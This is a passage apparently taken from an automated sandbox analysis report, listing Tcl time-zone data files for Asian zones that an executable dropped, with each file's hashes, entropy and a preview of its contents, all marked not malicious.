Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Macau) {. {-9223372036854775808 27260 0 LMT}. {-1830411260 28800 0 MOT}. {-277360200 32400 1 MOST}. {-257405400 28800 0 MOT}. {-245910600 32400 1 MOST}. {-225955800 28800 0 MOT}. {-214473600 32400 1 MOST}. {-194506200 28800 0 MOT}. {-182406600 32400 1 MOST}. {-163056600 28800 0 MOT}. {-150969600 32400 1 MOST}. {-131619600 28800 0 MOT}. {-117088200 32400 1 MOST}. {-101367000 28800 0 MOT}. {-85638600 32400 1 MOST}. {-69312600 28800 0 MOT}. {-53584200 32400 1 MOST}. {-37863000 28800 0 MOT}. {-22134600 32400 1 MOST}. {-6413400 28800 0 MOT}. {9315000 32400 1 MOST}. {25036200 28800 0 MOT}. {40764600 32400 1 MOST}. {56485800 28800 0 MOT}. {72201600 32400 1 MOST}. {87922800 28800 0 MOT}. {103651200 32400 1 MOST}. {119977200 28800 0 MOT}. {135705600 32400 1 MOST}. {151439400 28800 0 MOT}. {167167800 32400 1 MOST}. {182889000 28800 0 MOT}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Magadan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2062
Entropy (8bit):	3.9651960170826297
Encrypted:	false
SSDEEP:	24:cQmech8vhOCTi7ZXltAtwGpd296ymXPO9UHxQdCHt/CXHmW9YbcINu/:5ZvhBiR8ld296yKPO9UHj1UGWgc4u/
MD5:	220CCD03883300BDB065F5C84154C490
SHA1:	D119526A949E7AFD014AF92532BD400E4B69E65A
SHA-256:	C06DFD091FF5F9555C97C40266A9F9164338332EE6E2192C409456EDB3B187D3
SHA-512:	B783445EF178C5497AFD9410038A0883259105B2EAC197C31D735E09426A3DAA1B87068E63C49757B19695BFC6EA489CF2ABE91DD2C6647C7B41D093DE3D2204
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Magadan) {. {-9223372036854775808 36192 0 LMT}. {-1441188192 36000 0 MAGT}. {-1247565600 39600 0 MAGMMTT}. {354891600 43200 1 MAGST}. {370699200 39600 0 MAGT}. {386427600 43200 1 MAGST}. {402235200 39600 0 MAGT}. {417963600 43200 1 MAGST}. {433771200 39600 0 MAGT}. {449586000 43200 1 MAGST}. {465318000 39600 0 MAGT}. {481042800 43200 1 MAGST}. {496767600 39600 0 MAGT}. {512492400 43200 1 MAGST}. {528217200 39600 0 MAGT}. {543942000 43200 1 MAGST}. {559666800 39600 0 MAGT}. {575391600 43200 1 MAGST}. {591116400 39600 0 MAGT}. {606841200 43200 1 MAGST}. {622566000 39600 0 MAGT}. {638290800 43200 1 MAGST}. {654620400 39600 0 MAGT}. {670345200 36000 0 MAGMMTT}. {670348800 39600 1 MAGST}. {686073600 36000 0 MAGT}. {695750400 39600 0 MAGMMTT}. {701784000 43200 1 MAGST}. {717505200 39600 0 MAGT}. {733244400 43200 1 MAGST}. {748969200 39600

C:\Users\user\Desktop\tcl\tzdata\Asia\Makassar Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	233
Entropy (8bit):	4.702500555605613
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKCm2OHUVRYQTLQTvUfkc3gaTHkH8vmen:MBp526mdHsrTD8cQM7Bn
MD5:	77474CD64DC23E3CBD7B69476BB16D13
SHA1:	993409CCA67B4F6F3116D54C6E251C883C3ECAA4
SHA-256:	5E036E1C4180CEFE48D089C163CCA7B2F65D159CB5D9FC5FB41CABF63495C07D
SHA-512:	EB995DE13E0602C487DC02920379E6D4518BBC188582CEDB91BE8CCDFC4B1127459F5E6FD8BEF5D21AC2636AAE606A9E7F9F3B9AED736FC8D8963398AEE8CD0D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Makassar) {. {-9223372036854775808 28656 0 LMT}. {-1577951856 28656 0 MMT}. {-1172908656 28800 0 CIT}. {-880272000 32400 0 JST}. {-766054800 28800 0 CIT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Manila Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	409
Entropy (8bit):	4.441574068554676
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKefwJm2OHVkezucVAePHZb8vfRvWdAcQzvmy2mRKEjvfgAf5kvfQQC:MBp52G4JmdHnzZBPyHncQzXXjHiH6
MD5:	CCDABEEDF0EC4CC598557F5F7C18568A
SHA1:	D4C3EB158887A7B564DD7462FD8BDD52E95B6B98
SHA-256:	19BA48A251DBCF8435B4D8797AE9EE94CF24D9247A1ADD987B3A6075EB0FE4D3
SHA-512:	A24F2264F258CF502C64FE4EC4ED393D0B74325AB4203D14A97ECEF435D0811196FFA6884328E8B0BCE5348B70665E05549AEB280F880BC901CA6A82E59A938A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Manila) {. {-9223372036854775808 -57360 0 LMT}. {-3944621040 29040 0 LMT}. {-2229321840 28800 0 PHT}. {-1046678400 32400 1 PHST}. {-1038733200 28800 0 PHT}. {-873273600 32400 0 JST}. {-794221200 28800 0 PHT}. {-496224000 32400 1 PHST}. {-489315600 28800 0 PHT}. {259344000 32400 1 PHST}. {275151600 28800 0 PHT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Muscat Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	143
Entropy (8bit):	4.950706476878056
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKvE+wcXGm2OH6vvUQKX+FVVL:SlSWB9X52wKLwTm2OHCRXzL
MD5:	09E699173EBF983DEBCAF30344DAE627
SHA1:	35B8542EBF15B6B1C11CD22A9AFAC3ED050B89EC
SHA-256:	C6F343564E02CAC8935657EACC3DD14A88D08C9BE44D95DADEF7100EAD828C10
SHA-512:	F5E9F422E2C8DDA95C17C5E51B4B4F5C29CD5409713604BA74F31D34103BE3D99C2760C88034B924A8D11AE44E7EBE2F39D6E04C468977504CC7ABA8CAB5271A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Muscat) {. {-9223372036854775808 14064 0 LMT}. {-1577937264 14400 0 GST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Nicosia Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7368
Entropy (8bit):	3.620699686510499
Encrypted:	false
SSDEEP:	96:EPByq7VKviW/naKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEA:EPFi//uh2kNU4tB715pyzHy1gA
MD5:	21EEEC6314C94D1476C2E79BBACFEB77
SHA1:	2C9805CD01C84D446CBDB90B9542CB24CCDE4E39
SHA-256:	7AAB1AC67D96287EE468608506868707B28FCD27A8F53128621801DCF0122162
SHA-512:	D4B0A0E60B102E10E03CF5BD07C5783E908D5E7079B646177C57C30D67B44C114EFF4DCFC71AF8441D67BD5A351068FBFFD8C5E08F06F1D69946B3EA7D49FC2D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Nicosia) {. {-9223372036854775808 8008 0 LMT}. {-1518920008 7200 0 EET}. {166572000 10800 1 EEST}. {182293200 7200 0 EET}. {200959200 10800 1 EEST}. {213829200 7200 0 EET}. {228866400 10800 1 EEST}. {243982800 7200 0 EET}. {260316000 10800 1 EEST}. {276123600 7200 0 EET}. {291765600 10800 1 EEST}. {307486800 7200 0 EET}. {323820000 10800 1 EEST}. {338936400 7200 0 EET}. {354664800 10800 1 EEST}. {370386000 7200 0 EET}. {386114400 10800 1 EEST}. {401835600 7200 0 EET}. {417564000 10800 1 EEST}. {433285200 7200 0 EET}. {449013600 10800 1 EEST}. {465339600 7200 0 EET}. {481068000 10800 1 EEST}. {496789200 7200 0 EET}. {512517600 10800 1 EEST}. {528238800 7200 0 EET}. {543967200 10800 1 EEST}. {559688400 7200 0 EET}. {575416800 10800 1 EEST}. {591138000 7200 0 EET}. {606866400 10800 1 EEST}. {622587600 7200 0 EET}. {638316000 10800

C:\Users\user\Desktop\tcl\tzdata\Asia\Novokuznetsk Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2100
Entropy (8bit):	3.991468050987289
Encrypted:	false
SSDEEP:	24:cQ2fegXpYVOXgOE2jjyEkFR5Aynx7Xi/X+TipKS5llw+SNXCB3XkE5VXYpobxe5l:51fKydR/7Sf+uDyPQ3m302jT2o/
MD5:	5D8B8C58AC2BBAA504B14DCE3587715A
SHA1:	330AB1E3D8D81B5C18A1D7559DB55AECB0276A6A
SHA-256:	416E8BE13EA96AC31DC681747BD25DD10F00906C11BB59E56F9E307451480E90
SHA-512:	4F2D22FD71175F0785C358202DD83549CF92BCE8B76DEF1A2E441F5E324C1CB9DE24A9229614763B2DA0B3E677579E9C05952AC8DB1D07953F24AD6486225035
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Novokuznetsk) {. {-9223372036854775808 20928 0 NMT}. {-1577512128 21600 0 KRAT}. {-1247551200 25200 0 KRAMMTT}. {354906000 28800 1 KRAST}. {370713600 25200 0 KRAT}. {386442000 28800 1 KRAST}. {402249600 25200 0 KRAT}. {417978000 28800 1 KRAST}. {433785600 25200 0 KRAT}. {449600400 28800 1 KRAST}. {465332400 25200 0 KRAT}. {481057200 28800 1 KRAST}. {496782000 25200 0 KRAT}. {512506800 28800 1 KRAST}. {528231600 25200 0 KRAT}. {543956400 28800 1 KRAST}. {559681200 25200 0 KRAT}. {575406000 28800 1 KRAST}. {591130800 25200 0 KRAT}. {606855600 28800 1 KRAST}. {622580400 25200 0 KRAT}. {638305200 28800 1 KRAST}. {654634800 25200 0 KRAT}. {670359600 21600 0 KRAMMTT}. {670363200 25200 1 KRAST}. {686088000 21600 0 KRAT}. {695764800 25200 0 KRAMMTT}. {701798400 28800 1 KRAST}. {717519600 25200 0 KRAT}. {733258800 28800 1 KRAST}. {748983600 2

C:\Users\user\Desktop\tcl\tzdata\Asia\Novosibirsk Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2096
Entropy (8bit):	3.9605964443194677
Encrypted:	false
SSDEEP:	24:cQ2sIe2lNXh/iOIYyxFRP7z/X9TipN5xCB0wuoC1SQ7x7QwC4Jc/srC2TTV9oOux:5HYKKy/RP7zf9uXniu7ZTTwOc
MD5:	B3F21E7096CE4AEE5E5EED20023726FA
SHA1:	14BD32BABBC6CAF0C7362D6F0388850C5B853495
SHA-256:	17BEEA06913102EF3751A2185636D06B87D51CA8387A460B8A33EE1204E7B1C7
SHA-512:	841E8D64AD5104E32786DBE050AEF25E73ECECFF0B54ACE7D3126AA52D9C71C1E953FE67C2732F7E0E2053B8985CB5543B489D274F030BD8D7555E67FB4A166B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Novosibirsk) {. {-9223372036854775808 19900 0 LMT}. {-1579476700 21600 0 NOVT}. {-1247551200 25200 0 NOVMMTT}. {354906000 28800 1 NOVST}. {370713600 25200 0 NOVT}. {386442000 28800 1 NOVST}. {402249600 25200 0 NOVT}. {417978000 28800 1 NOVST}. {433785600 25200 0 NOVT}. {449600400 28800 1 NOVST}. {465332400 25200 0 NOVT}. {481057200 28800 1 NOVST}. {496782000 25200 0 NOVT}. {512506800 28800 1 NOVST}. {528231600 25200 0 NOVT}. {543956400 28800 1 NOVST}. {559681200 25200 0 NOVT}. {575406000 28800 1 NOVST}. {591130800 25200 0 NOVT}. {606855600 28800 1 NOVST}. {622580400 25200 0 NOVT}. {638305200 28800 1 NOVST}. {654634800 25200 0 NOVT}. {670359600 21600 0 NOVMMTT}. {670363200 25200 1 NOVST}. {686088000 21600 0 NOVT}. {695764800 25200 0 NOVMMTT}. {701798400 28800 1 NOVST}. {717519600 25200 0 NOVT}. {733258800 28800 1 NOVST}. {738090000 25

C:\Users\user\Desktop\tcl\tzdata\Asia\Omsk Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2059
Entropy (8bit):	3.877632463933148
Encrypted:	false
SSDEEP:	24:cQaEeTt6l6QFCxZq7LDZgr4jm5+WKvTT5Tm5HTPbEmC5QzCpomuSCh023HlUwCs0:5ampkq9DJ9EHL4mREetpTTyOk
MD5:	59A283ACF2372A6D8AC7080B151FAD3D
SHA1:	853210EF536FED240D7FFA40C8017B6267329966
SHA-256:	FA2FB396488491C7E7E6EC3738C69BA2F1610AE953848D7706ECDE4FFBBEFE80
SHA-512:	38EEC92F34895CCCC985C14E656463FB7E4702F12B74A8C7512AD38BDD31E47A924B6A21C5C3C628C8D470D39112838EDDC3CE98A97319E0DD9CF180A4F77BDE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Omsk) {. {-9223372036854775808 17616 0 LMT}. {-1582088016 18000 0 OMST}. {-1247547600 21600 0 OMSMMTT}. {354909600 25200 1 OMSST}. {370717200 21600 0 OMST}. {386445600 25200 1 OMSST}. {402253200 21600 0 OMST}. {417981600 25200 1 OMSST}. {433789200 21600 0 OMST}. {449604000 25200 1 OMSST}. {465336000 21600 0 OMST}. {481060800 25200 1 OMSST}. {496785600 21600 0 OMST}. {512510400 25200 1 OMSST}. {528235200 21600 0 OMST}. {543960000 25200 1 OMSST}. {559684800 21600 0 OMST}. {575409600 25200 1 OMSST}. {591134400 21600 0 OMST}. {606859200 25200 1 OMSST}. {622584000 21600 0 OMST}. {638308800 25200 1 OMSST}. {654638400 21600 0 OMST}. {670363200 18000 0 OMSMMTT}. {670366800 21600 1 OMSST}. {686091600 18000 0 OMST}. {695768400 21600 0 OMSMMTT}. {701802000 25200 1 OMSST}. {717523200 21600 0 OMST}. {733262400 25200 1 OMSST}. {748987200 21600 0 O

C:\Users\user\Desktop\tcl\tzdata\Asia\Oral Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1683
Entropy (8bit):	3.967686330951165
Encrypted:	false
SSDEEP:	24:cQ3eHy9r8hb2JJGI4Sdgb88+8g6zcCbYQftQkSbFQvQQGeQZWbWQhKQDccXQfuQn:5FB8hb2GIpco6Z4b
MD5:	4BAEFD23FCA4E54B97FD87022C99A34C
SHA1:	E43F66AD0D661A280D0E738C5E287DE8E470E7ED
SHA-256:	2D551E0CFCDEB165033A91FB36DB2104C1B1A768EACE2BF722E88555A2981072
SHA-512:	6B34B16EFF99CFE6B12E3A2EF503139CBDBAC162B314DE0D031F5EEF5CC5517DA52965D84367E727924157BF19D2F522031D7760EF4F1B321EBB921C05BA0BCD
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Oral) {. {-9223372036854775808 12324 0 LMT}. {-1441164324 14400 0 URAT}. {-1247544000 18000 0 URAT}. {354913200 21600 1 URAST}. {370720800 21600 0 URAT}. {386445600 18000 0 URAT}. {386449200 21600 1 URAST}. {402256800 18000 0 URAT}. {417985200 21600 1 URAST}. {433792800 18000 0 URAT}. {449607600 21600 1 URAST}. {465339600 18000 0 URAT}. {481064400 21600 1 URAST}. {496789200 18000 0 URAT}. {512514000 21600 1 URAST}. {528238800 18000 0 URAT}. {543963600 21600 1 URAST}. {559688400 18000 0 URAT}. {575413200 21600 1 URAST}. {591138000 18000 0 URAT}. {606862800 14400 0 URAT}. {606866400 18000 1 URAST}. {622591200 14400 0 URAT}. {638316000 18000 1 URAST}. {654645600 14400 0 URAT}. {662673600 14400 0 URAT}. {692827200 14400 0 ORAT}. {701809200 18000 1 ORAST}. {717530400 14400 0 ORAT}. {733269600 18000 1 ORAST}. {748994400 14400 0 ORAT}. {

C:\Users\user\Desktop\tcl\tzdata\Asia\Phnom_Penh Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	237
Entropy (8bit):	4.709832011426896
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKTNMCm2OHAMVPk9ACuGLQuGLn:MBp52lmdHJVPXSLML
MD5:	CE619AC863B4B50623C5D502FF36025C
SHA1:	9EDFCC3FA86C99B5407FBE25CBF1BB5E624FDE7B
SHA-256:	3D1F8D91A90A1DDFC5413BBA540CDCBF07F179A3C2BAD97CD60AEE400AB84E0F
SHA-512:	8D9840E2AC1D774EB00A295A520C2509B7E250EFF185B0A20240868DA15FD85E64F1BF2038ADEE564E8AE553BAD611447DCFF82D99AB21B7CA82F1C4BEAC8CDC
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Phnom_Penh) {. {-9223372036854775808 25180 0 LMT}. {-2005973980 25580 0 SMT}. {-1855983920 25200 0 ICT}. {-1819954800 28800 0 ICT}. {-1220428800 25200 0 ICT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Pontianak Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	349
Entropy (8bit):	4.480352314345121
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKT5wFJm2OHUed9xMkc5k/wQmCLkvmJdwQo1RoF4mwQmTFa1HVVivwE:MBp52L5wFJmdHFxbc5kw+LkIwd4F4mwF
MD5:	175472E944709AF50955EE8B40ADA276
SHA1:	BAC49B678E6F7CD63667DBA05303DCBC4D0912CF
SHA-256:	B9D9190291A2135FEC70679697391CAAA08C2E188A14F5BE2331FC5B94416705
SHA-512:	518743317E1459300F0DC0EC391499AE1667BF47B1C416D2140E0C923AD5A747F9476C8FF23BF51F948D7FCEE8EF9508C02DFCB9D3980379410E7C177D5D255C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Pontianak) {. {-9223372036854775808 26240 0 LMT}. {-1946186240 26240 0 PMT}. {-1172906240 27000 0 WIT}. {-881220600 32400 0 JST}. {-766054800 27000 0 WIT}. {-683883000 28800 0 WIT}. {-620812800 27000 0 WIT}. {-189415800 28800 0 CIT}. {567964800 25200 0 WIT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Pyongyang Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	294
Entropy (8bit):	4.595842191693372
Encrypted:	false
SSDEEP:	6:SlSWB9X52wK8cE4Lm2OHnNPU948v+A6/WIkvadA7v7:MBp520cEWmdHnNPU+8mA6/y4A7D
MD5:	5247E3ED25B86955582B1273793D9876
SHA1:	F0A5FCA9BD02C7A0AE33D6CC4A85BB5F2EBDAEBF
SHA-256:	2EC60220F0FE1E837CAAFF448093BBE312EC81DA7CB6E061158406B9666977D0
SHA-512:	A5788CE3F2132A44E6C8CA4BF86C7BA3B5DD04C4E489D3FD9115DDCBB8CEDA3CC4C98CE8215BADF69F6AB43E217DB962681489ACCDE476FF8649EE99C6267459
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Pyongyang) {. {-9223372036854775808 30180 0 LMT}. {-2524551780 30600 0 KST}. {-2053931400 32400 0 KST}. {-1325494800 30600 0 KST}. {-1199262600 32400 0 KST}. {-498128400 28800 0 KST}. {-264931200 32400 0 KST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Qatar Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	169
Entropy (8bit):	4.8601645539109075
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKK3vFSXGm2OHPFV4YvUQKb3VvVVGF5FRVGwvYv:SlSWB9X52wKK3vTm2OHoYRcvzGfFRVS
MD5:	9462D89F06D17A43817EA860AF040C21
SHA1:	EBAFBD932708A7A7228364BDBFCD864AB4BE9022
SHA-256:	6E1A5814923D6C241E19B14BE409EBD3B6E2A21000B55A76F3E8B185C081F847
SHA-512:	2D5617D7113B349F29AF3EBA4B4321CC0A17B1FBF673E7D23FF7482F3F16235E5070281AD73CF5C74DC019DD39F8DD40D1A4D4DDCC08F8C2B6F6D772F4A85501
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Qatar) {. {-9223372036854775808 12368 0 LMT}. {-1577935568 14400 0 GST}. {76190400 10800 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Qyzylorda Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1688
Entropy (8bit):	4.021869489592274
Encrypted:	false
SSDEEP:	24:cQweNE9FYaSkXkh8K7hYeO8rmXqI8p/9fIwgdl3xWhf89KukUCN9AC9sdulCddlR:56P0h8UhYqkqI+F7YVYfB8ptOe
MD5:	DF2E642EB0CFE12904C72A4D25663912
SHA1:	69F30DC39AF84B15968CE1EDC14ACCAC3A53C89B
SHA-256:	3B9567139E18C3E7BABA078B8EDB942D1E9E388C7EE44F159D569A713DC7555C
SHA-512:	C31EA6977FF25B8463C8B7D14A1B176C1311E522556A3F8F3C0C54D617CC929927009A870FECF75F52413EDF1E06A12FDFE0A66A9B1974975BB90350ED36C80F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Qyzylorda) {. {-9223372036854775808 15712 0 LMT}. {-1441167712 14400 0 KIZT}. {-1247544000 18000 0 KIZT}. {354913200 21600 1 KIZST}. {370720800 21600 0 KIZT}. {386445600 18000 0 KIZT}. {386449200 21600 1 KIZST}. {402256800 18000 0 KIZT}. {417985200 21600 1 KIZST}. {433792800 18000 0 KIZT}. {449607600 21600 1 KIZST}. {465339600 18000 0 KIZT}. {481064400 21600 1 KIZST}. {496789200 18000 0 KIZT}. {512514000 21600 1 KIZST}. {528238800 18000 0 KIZT}. {543963600 21600 1 KIZST}. {559688400 18000 0 KIZT}. {575413200 21600 1 KIZST}. {591138000 18000 0 KIZT}. {606862800 21600 1 KIZST}. {622587600 18000 0 KIZT}. {638312400 21600 1 KIZST}. {654642000 18000 0 KIZT}. {662670000 18000 0 KIZT}. {692823600 18000 0 QYZT}. {695768400 21600 0 QYZT}. {701802000 25200 1 QYZST}. {717523200 21600 0 QYZT}. {733262400 25200 1 QYZST}. {748987200 21600 0 QYZT}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Rangoon Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	233
Entropy (8bit):	4.700824643200826
Encrypted:	false
SSDEEP:	6:SlSWB9X52wK0GEEm2OHGVXdPZNGVyKFMsDVkvm8Y/s59Ln:MBp52nEEmdHGldPZNGYANkhpn
MD5:	21A8C8B771F9644AB3EAED8CA4512408
SHA1:	27D65D7A9E9403103CADA0C0D507708DD98DFC39
SHA-256:	6CFCB7D781F87E1B7ED88FD2DAD6C80DA921CD55B50A1AC650FD2F787201FE2A
SHA-512:	5292EF66277CCE29F10FB55B054A90FB6B4680D387CB4834FF5BF2F182052B5C3F6A8621A1BCEC4671851EFE8B40B8EFC31CC12F5F45DB380F68BD906F26FEB6
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Rangoon) {. {-9223372036854775808 23080 0 LMT}. {-2840163880 23080 0 RMT}. {-1577946280 23400 0 BURT}. {-873268200 32400 0 JST}. {-778410000 23400 0 MMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Riyadh Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	142
Entropy (8bit):	4.929505504523299
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFK814tXGm2OHFukevTp+adwvYv:SlSWB9X52wK81Hm2OHF7eLMal
MD5:	C54FE8F9749387B854E378718649629D
SHA1:	5177FE082DFE0BBA954C3FCEF45BC7839C821D6F
SHA-256:	0650B76D22E1126AC00396902D0977AD8C69E8278F0D8E0C0C0866ACE2B14062
SHA-512:	AD85A2038D240E0A9B61FB294592F4F5FF37CDED09AEAAE2CB866B4799A105FC90DAE8D65FD1E3312657A7F36DB534FD4AE5D093B4C2BA324F7F0688B0B6D7BC
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Riyadh) {. {-9223372036854775808 11212 0 LMT}. {-631163212 10800 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Saigon Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	183
Entropy (8bit):	4.899371908380106
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8I65eVyVAIgN2h659Q2WFKwJ6h4WFK365ev:SlSWB9IZaM3yJAVyVAIgA4s2wKl4wKKK
MD5:	A978C9AD6320DA94CB15324CA82C7417
SHA1:	585C232F3FB2693C78C7831C1AF1DC25D6824CA7
SHA-256:	73E1850BB0827043024EAFA1934190413CB36EA6FE18C90EA86B9DBC1D61EEBF
SHA-512:	AE48BFB2A348CA992F2BCD6B1AF7495713B0526C326678309133D3271D90600624C096B4B8678AD7ECD19822E3BB24E27D12680FCA7FAA455D3CE324CE0B88ED
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ho_Chi_Minh)]} {. LoadTimeZoneFile Asia/Ho_Chi_Minh.}.set TZData(:Asia/Saigon) $TZData(:Asia/Ho_Chi_Minh).

C:\Users\user\Desktop\tcl\tzdata\Asia\Sakhalin Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2123
Entropy (8bit):	3.9225386099969
Encrypted:	false
SSDEEP:	48:5i5mvzfkLCHT2voaWlOvUhxJWHflhQXAYM:gOHT2vRvwAHdSQYM
MD5:	FC3FBB8678F6ADDCC2E8A75C5EA11D11
SHA1:	07031E2083111F1A62FAB06696B085B39E91418F
SHA-256:	BC449A02DA420CB0D2E6FE61FB4C23282EDE71E64761B60D5F0601E5974FB915
SHA-512:	684967E52B175EB77D883FB9D8D168C7EDE5728EF5EED6F9A281407FEAA27512F64FB9F7C6D711EE25029FAC966ABB7B1A167C2F74CEED1020E7CAEDBCF18176
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Sakhalin) {. {-9223372036854775808 34248 0 LMT}. {-2031039048 32400 0 CJT}. {-1009875600 32400 0 JST}. {-768560400 39600 0 SAKMMTT}. {354891600 43200 1 SAKST}. {370699200 39600 0 SAKT}. {386427600 43200 1 SAKST}. {402235200 39600 0 SAKT}. {417963600 43200 1 SAKST}. {433771200 39600 0 SAKT}. {449586000 43200 1 SAKST}. {465318000 39600 0 SAKT}. {481042800 43200 1 SAKST}. {496767600 39600 0 SAKT}. {512492400 43200 1 SAKST}. {528217200 39600 0 SAKT}. {543942000 43200 1 SAKST}. {559666800 39600 0 SAKT}. {575391600 43200 1 SAKST}. {591116400 39600 0 SAKT}. {606841200 43200 1 SAKST}. {622566000 39600 0 SAKT}. {638290800 43200 1 SAKST}. {654620400 39600 0 SAKT}. {670345200 36000 0 SAKMMTT}. {670348800 39600 1 SAKST}. {686073600 36000 0 SAKT}. {695750400 39600 0 SAKMMTT}. {701784000 43200 1 SAKST}. {717505200 39600 0 SAKT}. {733244400 43200 1

C:\Users\user\Desktop\tcl\tzdata\Asia\Samarkand Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.096613862431634
Encrypted:	false
SSDEEP:	12:MBp52tlmdHhV9kSogKk4khWuf7Z/UOfmWnmjDIdhWdMr2jmjdODPRWZsdXT4WuwD:cQtlehHkETh7tmdPIiOdzeJTUPc
MD5:	C734A56858833277CC5C6895EB7CC3FD
SHA1:	8CC1CC9B2B2159CAF7DB4FF4F7B6E3DC3AF4811B
SHA-256:	3937769CEBF476F6E83E2C900D70C729E33CD970B357019AE1E3948215B91CB7
SHA-512:	E60BF531C5DE076033314346B9B0D62BC9009719837A98FE66BB2FE85DD2BE0AE1CD49CCA09784523ABF3DB683AB70E3E78DDDB6FC91A7F320DD6A3AF18D3966
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Samarkand) {. {-9223372036854775808 16032 0 LMT}. {-1441168032 14400 0 SAMT}. {-1247544000 18000 0 SAMT}. {354913200 21600 1 SAMST}. {370720800 21600 0 TAST}. {386445600 18000 0 SAMT}. {386449200 21600 1 SAMST}. {402256800 18000 0 SAMT}. {417985200 21600 1 SAMST}. {433792800 18000 0 SAMT}. {449607600 21600 1 SAMST}. {465339600 18000 0 SAMT}. {481064400 21600 1 SAMST}. {496789200 18000 0 SAMT}. {512514000 21600 1 SAMST}. {528238800 18000 0 SAMT}. {543963600 21600 1 SAMST}. {559688400 18000 0 SAMT}. {575413200 21600 1 SAMST}. {591138000 18000 0 SAMT}. {606862800 21600 1 SAMST}. {622587600 18000 0 SAMT}. {638312400 21600 1 SAMST}. {654642000 18000 0 SAMT}. {670366800 21600 1 SAMST}. {683665200 21600 0 UZST}. {686091600 18000 0 UZT}. {694206000 18000 0 UZT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Seoul Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	488
Entropy (8bit):	4.266401496153091
